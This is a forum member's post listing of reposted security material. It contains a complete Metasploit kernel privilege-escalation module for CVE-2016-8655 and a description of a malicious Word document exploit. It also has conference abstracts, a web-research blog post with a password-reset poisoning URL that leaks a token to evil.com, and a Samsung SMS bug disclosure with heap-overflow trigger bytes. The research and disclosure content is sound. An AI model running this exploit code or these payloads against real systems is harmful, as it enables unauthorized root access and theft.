Everything posted by Nytro

  1. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AF_PACKET chocobo_root Privilege Escalation',
      'Description'    => %q{
        This module exploits a race condition and use-after-free in the
        packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in
        the Linux kernel to execute code as root (CVE-2016-8655).

        The bug was initially introduced in 2011 and patched in 2016 in
        version 4.4.0-53.74, potentially affecting a large number of
        kernels; however this exploit targets only systems using Ubuntu
        (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux
        distros based on Ubuntu, such as Linux Mint.

        The target system must have unprivileged user namespaces enabled
        and two or more CPU cores.

        Bypasses for SMEP, SMAP and KASLR are included. Failed
        exploitation may crash the kernel.

        This module has been tested successfully on Linux Mint 17.3 (x86_64);
        Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel
        versions 4.4.0-45-generic and 4.4.0-51-generic.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rebel',         # Discovery and chocobo_root.c exploit
          'Brendan Coles'  # Metasploit
        ],
      'DisclosureDate' => 'Aug 12 2016',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'AKA', 'chocobo_root.c' ],
          [ 'EDB', '40871' ],
          [ 'CVE', '2016-8655' ],
          [ 'BID', '94692' ],
          [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],
          [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],
          [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],
          [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],
          [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],
          [ 'URL', 'https://www.securitytracker.com/id/1037403' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]
        ],
      'DefaultTarget'  => 0))
    register_options [
      OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def timeout
    datastore['TIMEOUT'].to_i
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def upload_and_compile(path, data)
    upload "#{path}.c", data
    gcc_cmd = "gcc -o #{path} #{path}.c -lpthread"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end
    output = cmd_exec gcc_cmd
    rm_f "#{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end
    cmd_exec "chmod +x #{path}"
  end

  def exploit_data(file)
    path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file
    fd = ::File.open path, 'rb'
    data = fd.read fd.stat.size
    fd.close
    data
  end

  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end

    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end
  end

  def check
    version = kernel_release
    unless version =~ /^4\.4\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/
      vprint_error "Linux kernel version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Linux kernel version #{version} is vulnerable"

    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"

    cores = get_cpu_info[:cores].to_i
    min_required_cores = 2
    unless cores >= min_required_cores
      vprint_error "System has less than #{min_required_cores} CPU cores"
      return CheckCode::Safe
    end
    vprint_good "System has #{cores} CPU cores"

    unless userns_enabled?
      vprint_error 'Unprivileged user namespaces are not permitted'
      return CheckCode::Safe
    end
    vprint_good 'Unprivileged user namespaces are permitted'

    CheckCode::Appears
  end

  def exploit
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Upload exploit executable
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile executable_path, exploit_data('chocobo_root.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx executable_path, exploit_data('chocobo_root')
    end

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Launch exploit
    print_status "Launching exploit (Timeout: #{timeout})..."
    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }
    print_status "Cleaning up #{payload_path} and #{executable_path}.."
    rm_f executable_path
    rm_f payload_path
  end
end

     Source: https://www.exploit-db.com/exploits/44696/?rss&utm_source=dlvr.it&utm_medium=twitter
  2. CVE-2018-8174-msf

     This is a Metasploit module which creates a malicious Word document to exploit CVE-2018-8174, a VBScript memory corruption vulnerability. This module is a very quick port and uses the exploit sample that was found in the wild. The exploit works only for Microsoft Office 32-bit. There are a lot of things that could be improved in this module, but I will update it in the future if I find some time.

     Installation: Copy CVE-2018-8174.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat/ and copy CVE-2018-8174.rtf to /usr/share/metasploit-framework/data/exploits/. The exploit doesn't work very well with meterpreter shellcode, so it's better to use a non-staged reverse shell.

     Disclaimer: DO NOT USE THIS SOFTWARE FOR ILLEGAL PURPOSES. THE AUTHOR DOES NOT ACCEPT ANY RESPONSIBILITY FOR ANY MISUSE OF THE CODE PROVIDED HERE.

     Source: https://github.com/0x09AL/CVE-2018-8174-msf
  3. Tegra is NVIDIA's embedded Android/Linux development platform featuring a powerful SoC. It is widely used in various types of devices such as smartphones, game consoles, and of course automotive systems. Built around Tegra-powered processors, the Tesla car boasts advanced infotainment and instrument cluster systems, so during the last two years of Tesla security research we gained lots of experience with the Tegra platform. In this talk, we briefly analyze some known vulnerabilities related to Tegra, and then we will talk about the implementation of NVMAP, a unified memory management interface on Tegra. Finally, we'll share some interesting vulnerabilities we found in the NVMAP interface, such as denial of service, sensitive memory leaks, and local privilege escalation.

     *** Sen Nie is a security researcher at Keen Lab. Currently his research is mainly focused on car hacking; before that he had many years of research experience in program analysis, such as symbolic execution, smart fuzzing and other vulnerability detection technologies.
  4. In the past few years, data-only kernel exploitation has been on the rise. Since 2011, abusing Desktop heap objects to gain higher exploit primitives has been seen in many exploits. Moving forward to 2015, the focus shifted to the GDI subsystem with the discovery of GDI Bitmap object abuse, and in 2017 the GDI Palette object abuse technique was released at DEF CON 25. All of these techniques aim to gain arbitrary/relative kernel memory read/write in order to further the exploit chain. In this talk we will focus on some of the discovered techniques and objects, and how we were able to use Type Isolation, released in RS4, to mitigate those exploitation techniques.

     *** Ian Kronquist enjoys working at the confluence of systems programming and security, building mitigations for Windows kernel vulnerabilities at Microsoft. He previously worked on a hypervisor designed to detect and stop malware at an antivirus startup called Barkly Protects in Boston, Massachusetts. Ian graduated from Oregon State University with a BS in Computer Science, and spent his college years working at the OSU Open Source Lab. Ian has traveled throughout Europe and Asia and spent a year studying the Turkish language and folk music in Southern Turkey.

     Saif is a security engineer in the Microsoft Security Response Center's Vulnerability & Mitigations team. He has a keen interest in exploit development and sharing everything he learns. He spends his time doing vulnerability research against Microsoft products and understanding new exploitation techniques and their real-world applications.
  5. So you want to be a web security researcher?

     James Kettle | 23 May 2018 at 14:00 UTC

     Are you interested in pushing hacking techniques beyond the current state of the art and sharing your findings with the infosec community? In this post I'll share some guidance on web security research, shaped by the opportunities and pitfalls I've experienced while pursuing this path myself.

     Breaking stuff for a living

     Most research is about taking existing techniques that bit further, so the first step is to get well acquainted with the current state of the art. The fastest way to achieve this is to get a job where you spend most of your time applying web hacking techniques. A lot of good people have shared detailed advice on getting into the security industry, so I'll keep this section brief. I recommend a practice-focused approach starting with the OWASP Broken Web Applications project, moving on to more realistic challenges like my own hackxor.net, advancing through soft, low-reward targets on HackerOne and Bugcrowd, and then finally onto well established high-payout bounty programs. Once you have a few publicly disclosed vulnerabilities it should be pretty easy to join a security consultancy and spend every day hacking stuff. There are plenty of free online resources to help you on the way, including our Burp methodology, HackerOne's Hacker101, and the OWASP testing guide. As for books, I'd recommend reading The Web Application Hacker's Handbook and The Tangled Web.

     Moving beyond known techniques

     Once you start working full time breaking stuff, you'll initially learn loads, but after a while your technical expertise will plateau unless you make a concerted effort to keep learning.

     Hunt forgotten knowledge

     Everyone knows you're meant to keep up with new developments by monitoring industry experts, news aggregators and security conferences. However, to exclusively follow new developments is to overlook a treasure trove of forgotten and overlooked research.
Every time you read a good quality blog post, read the entire archive. This will often unveil invaluable, forgotten tidbits of information. For example, take this post by RSnake about DNS rebinding, written in 2009. DNS rebinding completely bypasses IP/firewall based access controls on websites, and the only effective way to mitigate it is by making your application whitelist the HTTP Host header. And yet at the time, people quickly assumed it was mitigated by browsers; this forgotten vulnerability only re-entered common awareness with a string of exploits nine years later. Perusing archives will also help you avoid wasting time replicating work that's already been done by someone else, such as re-inventing a CSS attack one decade later. That said, some research is genuinely hard to find, so occasional duplication is inevitable. I've had a published technique collide with another researcher's, only for both of us to discover that kuza55 had done the same thing five years prior. So, do your best to avoid duplicating research, but if it happens anyway don't panic - it happens to all of us.

     Collect diversity

     To connect threads and spot opportunities that other people miss, it's crucial to collect information from a range of different sources. For a start, don't limit yourself to reading security content - you'll quickly find documentation can also serve as an exploit construction manual. Again, and this may be pretty obvious, but as well as trying to solve problems by Googling and posing well-phrased questions to Twitter/Reddit/StackOverflow, ensure you ask colleagues - there's a huge amount of knowledge floating around the community that people haven't opted to share publicly. Beyond that, try to ensure your own experiences are diverse too. Doing black-box pentests for a security consultancy should expose you to a broad range of external and internal web applications, the likes of which you'll rarely encounter in a bug bounty program.
But the time constraints will rob you of the chance to understand an application with the familiarity that comes from months of bug bounty hunting on a single target. And although it's often slow and constrained, white-box source code review can offer an irreplaceable alternative perspective, prompting attacks a black-box tester would never conceive. To nurture research, you ideally want a healthy mix of all three. Further experiences like playing CTFs and coding web applications can also add useful perspectives.

     No idea is too stupid

     One of the worst traps to fall into is dooming a great idea by assuming it won't work and not trying it, because "someone else would have noticed it already" or "that is too dumb to work". I've definitely fallen for this one before - one piece of research arrived two years later than it should have done thanks to such a mistake. Whether it's bypassing authentication by trying to log in with the same password repeatedly, or breaking into a Google administration page by switching from your laptop to your phone, the path to your next great exploit may well require a really stupid idea.

     Iterate, invent, share

     Iterate

     The easiest way to get started is to find some promising research by someone else, build on it by mixing in other techniques, then apply your new approach to some live targets to see if anything interesting happens. For example, this post on CORS misconfigurations pointed out an interesting behaviour and suggested that this behaviour was prevalent, but stopped short of exploring the impact on individual websites. I took this concept and applied it to bug bounty websites where I could legally explore the impact and try my hand at evading any mitigations they might have. Along the way I made some enhancements using common open redirect exploit techniques, discovered the 'null' origin technique by reading the CORS spec, and explored cache poisoning possibilities.
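As a rough sketch of the kind of misconfiguration being probed here (Python; the function and its classification rules are my own illustrative simplification, not PortSwigger's tooling):

```python
def cors_exploitable(origin_sent, acao, allow_credentials):
    """Classify a CORS response: exploitable when the server echoes an
    arbitrary Origin (or trusts 'null') while also allowing credentials."""
    if acao is None or not allow_credentials:
        return False
    if acao == "*":
        # Browsers refuse to combine ACAO "*" with credentials,
        # so this combination cannot leak authenticated data.
        return False
    # Reflected arbitrary origin, or the 'null' origin (reachable from
    # a sandboxed iframe) -- both let an attacker's page read responses.
    return acao == origin_sent or acao == "null"

# The classic misconfiguration: an arbitrary origin reflected with credentials.
print(cors_exploitable("https://evil.example", "https://evil.example", True))  # True
# The 'null' origin technique mentioned above:
print(cors_exploitable("null", "null", True))  # True
# A fixed whitelist is safe against an arbitrary attacker origin:
print(cors_exploitable("https://evil.example", "https://trusted.example", True))  # False
```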
Nothing in this process required sudden leaps of intuition or outstanding technical knowledge, and yet the resulting presentation and blog post were easily as well received as flashier efforts.

     Invent

     Iterating on other people's work is great, but the best research often seems to appear out of nowhere, be it Relative Path Overwrite or Web Cache Deception. My view is that such discoveries are caused by personal experiences that act as hints. I refer to these as leads or breadcrumbs, as they're often cryptic and it may take quite a few of them to guide you all the way to a useful discovery. For example, in 2011 I was trying to crack the CSRF protection used by addons.mozilla.org. I had bypassed the token check, but they also validated that the host in the Referer header matched the current site. I asked for help on the sla.ckers forum, and 'barbarianbob' spotted that Django determines the current site's host by looking at the HTTP Host header, and that this could be overridden with the X-Forwarded-Host header. This could be combined with a Flash header injection vulnerability to bypass the CSRF check, but more importantly it was the first breadcrumb - it hinted that applications may rely on the Host header to know their current location. A while later, I took a look at the source code of Piwik's password reset function and found a line that looked something like:

     $passwordResetLink = getCurrentUrlWithoutQueryString() + $secretToken

     Aha, I thought. Piwik uses PHP, which has hilarious path handling, so I can request a password reset at http://piwik.com/reset.php/foo;http://evil.com resulting in an email with two links, and the secret token being sent to evil.com. This idea worked, got me a bounty, and laid the foundation for the subsequent finding. The third and final crumb was the way Piwik tried to patch this vulnerability - they replaced getCurrentUrlWithoutQueryString() with getCurrentUrlWithoutFileName(). This meant that I couldn't use the path for an exploit anymore.
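The vulnerable pattern behind this breadcrumb can be sketched in a few lines (Python; the function names are invented stand-ins for Piwik's PHP helpers, not the real API):

```python
def build_reset_link(host_header, path, token):
    # Vulnerable pattern: the absolute URL in the reset email is derived
    # from attacker-influenced request data (Host header and path).
    return f"http://{host_header}{path}?token={token}"

# Normal request -> the link the developer expected:
print(build_reset_link("piwik.example", "/reset.php", "s3cret"))
# http://piwik.example/reset.php?token=s3cret

# Poisoned Host (or X-Forwarded-Host) header -> the secret token is
# mailed out inside a URL the attacker controls:
print(build_reset_link("evil.example", "/reset.php", "s3cret"))
# http://evil.example/reset.php?token=s3cret

# The robust fix: build links from a configured canonical base URL
# rather than from anything in the request.
CANONICAL_BASE = "https://piwik.example"  # hypothetical config value

def safe_reset_link(path, token):
    return f"{CANONICAL_BASE}{path}?token={token}"
```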
Thanks to the encounter with Django earlier, I decided to dig further into the code to find out how Piwik determined what the current host name was, and discovered that, like Django, it used the HTTP Host header, meaning I could easily generate poisoned password reset emails. As it turned out, this technique worked on addons.mozilla.org too, and Gallery, and Symfony, and Drupal, and a whole host of other sites, finally leading to Practical HTTP Host Header Attacks. By spelling out the discovery process in such a verbose way, I've hopefully demystified the research and made it look less like an idea spontaneously appearing out of the blue. Viewed from this perspective, it looks like the core skill (beyond pre-existing knowledge and breadth of experience) lies in recognising these breadcrumbs and persistently chasing after them. I can't quite articulate how to do this yet, but I do know to treat as a lead anything that makes you say "this makes no sense".

     Share

     Finally, it's crucial to share your research with the community. This will help increase your profile and perhaps persuade your employer to allocate you some more research time. Beyond that, it will help you avoid wasting time and spur further research - commenters are really good at pointing out prior work you had no idea existed, and there's nothing more rewarding than seeing another researcher building on your ideas. Please don't think a technique or idea isn't worth sharing just because you don't have a ground-breaking discovery, two logos and a presentation - just post whatever you have (ideally on a blog and not just some poorly indexed, locked-down platform like Twitter). When sharing research, it's always helpful to show at least one example of your technique being applied to exploit a real application. Without this, people will inevitably have difficulty understanding it, and may doubt that it has any practical value.
Finally, presentations are great for reaching a wider audience, but beware of getting caught up in the infosec circus circuit and spending your days repeating past presentations.

     Conclusion

     I have a lot more to learn about research myself, so I hope to revisit this topic in a few years with substantially more of a clue. Also, I expect other researchers have different perspectives, and I look forward to learning from any insights they decide to share. Finally, if you're looking for some reading to get yourself started, I've created a list of various blogs that have inspired me over the years. Good luck and have fun!

     James Kettle @albinowax

     Source: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher
  6. WAP just happened to my Samsung Galaxy?

     This is the third in a series of blogs about how, even in 2017, SMS-based attacks on Android phones are still viable. In part one, Al described how to set up infrastructure to launch potential attacks. In part two, we described how to identify your attack surface. This blog completes the journey (for now) and describes some of the bugs that we found, potential attack scenarios and the process of responsible disclosure that we followed to get the bugs fixed.

     By Tom Court and Neil Biggs | 24 Jan 2017 | Mobile, Product Security, Vulnerabilities and exploits

     TL;DR: We found bugs in Samsung Galaxy phones that can be triggered remotely via SMS, which when combined provide opportunities for ransomware peddlers. The Samsung Mobile Security Team were quick to fix the issues, providing a decent example of how coordinated disclosure should happen.

     What is WAP Push?

     The Wireless Application Protocol (WAP) suite has been in public operation since 1999. The Wireless Datagram Protocol (WDP), which forms part of the WAP suite, provides a UDP-like layer to transport data between two endpoints on specific ports. WDP itself can be transported over many protocols, including SMS (the focus of this blog). WAP Push is transported on WDP and allows content to be pushed to the device with minimal (or no) user intervention. The data is encoded using WAP Binary XML (WBXML).

     Bugs

     Reading the last two paragraphs should awaken your inner vulnerability-researching senses, given we are talking about a 17-year-old technology transporting arbitrary data, which is potentially received and processed without user interaction. Add to that the fact that the specification for the WBXML encoding standard runs to 30 pages and you have a target that begs to be investigated. On the downside, this stuff has been around for 17 years, surely all the bugs have been found and fixed by now… right?
WAP Push can be used to transport data for a multitude of applications. One application that caught our eye was the Open Mobile Alliance Client Provisioning (OMA CP) protocol, which allows remote device provisioning and configuration. This sounds like a powerful capability, so let's dig deeper! The devices we had to hand for our research were a series of Samsung Galaxy devices, so the remainder of this blog will be Samsung-centric. It is left as an exercise for the reader to investigate how this technology is handled by other vendors!

     Authentication

     Given the potential power of the OMA CP protocol, you would hope and expect that there is some level of authentication built in to stop the device blindly accepting configuration messages from anyone. Indeed, contained within the OMA CP spec is the following:

     "The connectivity media type may contain security information, which is transported as parameters to the media type application/vnd.wap.connectivity-wbxml. The security information consists of the message authentication code and the security method. The parameters MAC and SEC have been defined for this purpose and these MUST be supported by the WAP client." - OMA-WAP-TS-ProvCont-V1_1-20090728-A, Section 4.3

     Now let's see if it works in practice. On Samsung Galaxy devices, including the S7, which was the newest device at the time, OMA CP messages are handled by the 'omacp' app. We used our SMS test rig to craft some custom OMA CP SMS messages and send them to the devices. As it turns out, our rig was able to send these messages to these devices and they were received and duly processed, despite no authentication details being present in the message. May we introduce CVE-2016-7991. It appears as though the 'omacp' app completely ignores the security field of the message!

     Silent Service

     In the previous scenario, the user would be presented with a prompt before the OMA CP message was acted upon. Whilst we can assume that many (most?!)
users would blindly click accept just to get rid of the message, it is at least one barrier against unauthorized configuration change. The question is: are there any message types that get processed without the user being notified? We analysed the omacp app to identify any code flows where configurations are accepted without any user interaction. There were some clues that this may be possible, such as a check for "xcpSetBgInstall" which hints towards a possible background install. A function called xcpInstallWifiSetting also appeared to always be called if there were settings within the configuration message. This seemed very interesting, as we hoped that it would allow us to create a trusted Wi-Fi network profile on the phone with credentials we select, thus allowing us to stand up an access point which the phone would automatically connect to. The app makes use of a native C library, "libomacp", which handles the parsing of configuration messages. This would require a bit of reversing time to understand the message format, but as we're lazy we ideally wanted a quick test to see what this did. Once the app has parsed the message and established the Wi-Fi networks to create, it fires off an intent to the Wi-Fi service in the Android framework. Fortunately for us there were no permissions defined on the BroadcastReceiver in the Wi-Fi service, which meant we could ignore the WBXML format for now and create a test app to send an intent to see what this does… the phone then proceeded to crash, reboot, crash, repeat… With our phone now enacting Groundhog Day, we took a closer look at what was actually happening. It appears that when the 'omacp' app receives an OMA CP message for setting Wi-Fi access point credentials, it fires off an intent without any user interaction that is received by the WifiServiceImpl (WifiServiceImpl.jar) code that resides within the Android framework. This then goes ahead and updates a config file (/data/misc/wifi/default_ap.conf) with the new settings.
Fortunately we were able to get an adb connection to the phone, which had previously been rooted, and moved the dodgy file, which stopped the phone from crashing. But what exactly in this default_ap.conf file was causing the device to crash so terribly? A valid default_ap.conf gets written when the SET_WIFI intent is received and is read by the framework every time the Wi-Fi state changes, including on boot. The code that parses this file is contained within WifiServiceImpl.jar, specifically within the getVendorApInfoFromFile() function. This code expects each line of the config file to contain a key (ssid, password etc.) and a value that is interpreted as a comma-separated list, which is parsed immediately afterwards. The "networkCount" is derived from the number of comma-separated SSIDs, and then an assumption is made that the same number of elements are included in all other comma-separated lists in the file. Given that an attacker can control the contents of this file, this assumption can easily be exploited, causing an ArrayIndexOutOfBounds exception to be thrown. This in itself would not be the end of the world if it were not for the fact that this code is not wrapped in an exception handler, meaning that when the exception occurs, it crashes the entire Android runtime and the phone reboots. As the runtime comes up again it reads the config file once more and the same happens, causing a boot-loop condition of the Android runtime. This was clearly dangerous, as given the lack of permissions on the WifiService BroadcastReceiver, any app could send the com.android.intent.action.SET_WIFI intent and modify the default access point settings, which causes the phone to continually crash. We confirmed that this worked on an S4, S4 Mini, S5 and Note 4, but it did not initially work on an S6 or S7. We later confirmed it was possible on these newer models (more details later).
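The parsing assumption can be illustrated with a short sketch (Python; the key=value file layout and key names are a simplification of the decompiled getVendorApInfoFromFile() logic described above, not the actual code):

```python
def get_vendor_ap_info(conf_text):
    # Parse key/value lines, where each value is a comma-separated list
    # (mirrors the getVendorApInfoFromFile() behaviour described above).
    fields = {}
    for line in conf_text.strip().splitlines():
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip().split(",")

    networks = []
    # networkCount is derived solely from the number of SSIDs...
    network_count = len(fields["ssid"])
    for i in range(network_count):
        # ...but every other list is assumed to have the same length.
        # A mismatched "password" list raises IndexError here; in the
        # real code the equivalent ArrayIndexOutOfBounds exception was
        # unhandled and crashed the entire Android runtime.
        networks.append((fields["ssid"][i], fields["password"][i]))
    return networks

# A well-formed file parses fine:
print(get_vendor_ap_info("ssid=home,work\npassword=aaaa,bbbb"))

# An attacker-controlled file with mismatched list lengths crashes:
try:
    get_vendor_ap_info("ssid=a,b,c\npassword=only-one")
except IndexError:
    print("unhandled IndexError -> boot loop on a real device")
```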
These issues have since been registered as CVE-2016-7988 (WifiService permissions) and CVE-2016-7989 (unhandled exception in the Android runtime). The question then was: could we trigger this over-the-air (OTA) and, if so, which devices did it affect?

     OTA

     In order to trigger the bug over the air we now need to go back to the omacp app and work out the message format. The app makes use of a native C library, "libomacp", which handles the parsing of configuration messages – it's finally time to crack open IDA and do some proper reversing. After a bit of IDA Pro magic we identified how to construct a WBXML-encoded WAP Push message to set some Wi-Fi settings. In the process we also found a WBXML parsing bug that is registered as CVE-2016-7990.

     Side Track: Bonus Bug CVE-2016-7990 - Integer Overflow in libomacp.so

     Luckily, libomacp.so ships with debug symbols, which makes analysis in IDA Pro *much* easier… The parser has two important primitives to understand. The first and simplest is the wssClientProvWbxmlDecoderBufferReadByte(doc, dest) function, which as the name suggests reads a byte into a destination buffer and increments the read (src) pointer. It returns success or fail (0, 1). The second is the wssClientProvWbxmlDecoderBufferReadUint32(doc) function that unpacks a uint32 from a variable-length field. It reads up to a total of 5 bytes using the wssClientProvWbxmlDecoderBufferReadByte() function described above, which may seem strange given a uint32 can be a maximum of 4 bytes. It reads a fifth due to the way the variable-length encoding works. Having read a byte, the function treats the lower 7 bits as part of the uint32, and only if the top (8th) bit is set proceeds to read the next byte. Therefore values < 128 can be represented in only one byte. Assuming that the number is >= 128, the current cumulative value of the integer is logically shifted left 7 bits and OR'd with the 7 bits of this new byte.
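Pausing here, the variable-length decoding (and the overflow it sets up) can be sketched as follows (Python, with the 32-bit arithmetic simulated by masking; this mirrors the written description rather than the actual libomacp.so code):

```python
MASK32 = 0xFFFFFFFF

def read_varint_uint32(data, pos=0):
    """Decode the variable-length uint32 described above: 7 bits per
    byte, continuation flagged by the top bit, at most 5 bytes."""
    value = 0
    for i in range(5):
        byte = data[pos + i]
        value = ((value << 7) | (byte & 0x7F)) & MASK32
        if byte & 0x80 == 0:
            return value, pos + i + 1
    # The real parser returns an error if the 5th byte still has the
    # continuation bit set.
    raise ValueError("continuation bit set on 5th byte")

# 0xff 0xff 0xff 0xff 0x7f decodes to 0xffffffff:
length, _ = read_varint_uint32(bytes([0xFF, 0xFF, 0xFF, 0xFF, 0x7F]))
assert length == 0xFFFFFFFF

# The parser then allocates malloc(length + 2). In 32-bit arithmetic
# the addition wraps, so the allocation is tiny while the copy loop
# still runs `length` times -- a heap buffer overflow.
alloc_size = (length + 2) & MASK32
print(hex(length), "->", alloc_size)  # allocation of just 1 byte
```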
Again, if the top bit is set, another byte is read and the process is repeated. If the top bit is set on the 5th byte, the function returns an error and stores NULL in the return value. The bug can be found in the wssClientProcWbxmlDecoderMakeStrTable() function that is called as the final act of reading the WBXML header. This function uses the wssClientProvWbxmlDecoderReadUint32() function to read a length field from the input WBXML. It then adds 2 to this and performs a malloc(length+2). Following this it enters a loop, calling wssClientProvWbxmlDecoderReadByte() length times or until there is no more data to read in the WBXML input. If the user-controlled length field is sufficiently large, the addition of 2 extra bytes before the malloc() will cause an integer overflow and will result in a very small number of bytes being allocated. Following this allocation, a copy is performed using length rather than length+2, or until the end of the source buffer is reached. This results in a heap buffer overflow for length >= 0xfffffffe. In order to exploit this bug, the WBXML header must end with 0xffffffff encoded in the variable-length format as 5 bytes, becoming: 0xff 0xff 0xff 0xff 0x7f. Any bytes appearing in the file after this will get written into a heap allocation of 1 byte, causing an arbitrary-length heap overflow. In testing, this has overwritten a variety of things including function pointers, giving the potential for remote code execution on devices up to the S5 model. The S6 and S7 models are only vulnerable to attacks via a locally installed malicious app, as explained below.

     Back on track: Exposure

     The only minor piece of good news is that initially our SET_WIFI bug did not appear to work on the most recent Samsung Galaxy devices, the S6 or S7. The S4, S4 Mini, S5 and Note 4 are pretty old, surely nobody uses them anymore? Hmmmmm. Let's look at why this doesn't work on the S6 and S7.
As mentioned earlier, when a Wi-Fi configuration update message is received, the 'omacp' app fires off an intent that is picked up by a BroadcastReceiver set up by the WifiServiceImpl module within the Android runtime. On all the devices we tested, the 'omacp' app sent the SET_WIFI intent to com.android.intent.action.SET_WIFI. It turns out that the reason why the crash wasn't happening with our app on the S6 and S7 was that, intentionally or not, the BroadcastReceiver within WifiServiceImpl.jar is listening for com.samsung.android.intent.action.SET_WIFI but the app is still sending the older intent com.android.intent.action.SET_WIFI. A quick tweak of the app to send this intent and our S6 and S7 are now also continually crashing. However, from a remote vulnerability perspective there would be no way to trigger this on the S6 and S7, as the omacp app will always send the old intent into the ether.

     Remote DoS

     The complexity of exploiting an Android device in recent years has escalated to the point that more often than not a chain of bugs is required to achieve the desired effect. This case is no different, and we have shown here that it took two bugs to produce a viable attack vector, combined with some in-depth knowledge of the bespoke message format. If you have a rooted device, a fix for this is to simply use adb as the phone is coming up and delete the default_ap.conf file. If your device is not rooted, the only two solutions are to factory reset the phone (losing all your data) or hope that the attacker is kind enough to send you another OMA CP message containing a valid configuration. Given the reversible nature of this attack (a second SMS could be sent that restored the device to its unbroken state), it does not require much imagination to construct a potential ransomware scenario for these bugs.

     Fixes are available
Samsung have now released a security update that addresses these amongst other vulnerabilities, and as is our usual advice, it is recommended that users prioritise the installation of these updates.

Disclosure

On discovering the bugs, we contacted Samsung Mobile Security and privately notified them of the issues, including proof-of-concepts where necessary. Over the course of the next three months, we worked with a very pro-active team at Samsung to help them understand the issues and get them fixed.

Timeline:
17th June 2016 – Issues disclosed to vendor
21st June 2016 – Received acknowledgement from vendor
28th June 2016 – Received request for further details on one of the bugs
14th July 2016 – Received notification that all but one bug had been fixed
23rd August 2016 – Received notification from vendor that all issues are fixed and that a patch would be released in October
7th October 2016 – Received notification from vendor that the patch is delayed until Nov 7th
7th November 2016 – Patches released

Bug IDs:
SVE-2016-6542 (Samsung-specific vuln-id)
CVE-2016-7988 – No permissions on SET_WIFI broadcast receiver
CVE-2016-7989 – Unhandled ArrayIndexOutOfBounds exception in Android Runtime
CVE-2016-7990 – Integer overflow in libomacp.so
CVE-2016-7991 – omacp app ignores security fields in OMA CP message

About Tom Court and Neil Biggs

Sursa: https://www.contextis.com/blog/wap-just-happened-my-samsung-galaxy
  7. Nytro

    GraphWave

Detecting similar CFG-paths from HTTP responses in a black box manner

This Burp Suite extension detects similar code flows (CFG-paths) in requests and enables you to ignore them in active scans. Built with ❤︎ by Tijme Gommers – Donate via PayPal

Table of Contents: Documentation, Thesis, Presentation, Issues, License

Documentation
Please refer to the wiki for installation and usage instructions. Our F.A.Q. helps to troubleshoot any problems that might occur.

Thesis
Preview: latest build. Please note that the thesis has been anonymised and some private information has been redacted. The source of the thesis (LaTeX) is not open-source at the moment.

Presentation
Preview: latest build. Please note that the presentation has been anonymised and some private information has been redacted. The source of the presentation (LaTeX) is not open-source at the moment.

Issues
Issues or new features can be reported via the GitHub issue tracker. Please make sure your issue or feature has not yet been reported by anyone else before submitting a new one.

License
GraphWave is open-sourced software licensed under the MIT license.

Sursa: https://github.com/tijme/graphwave
  8. Gnirehtet

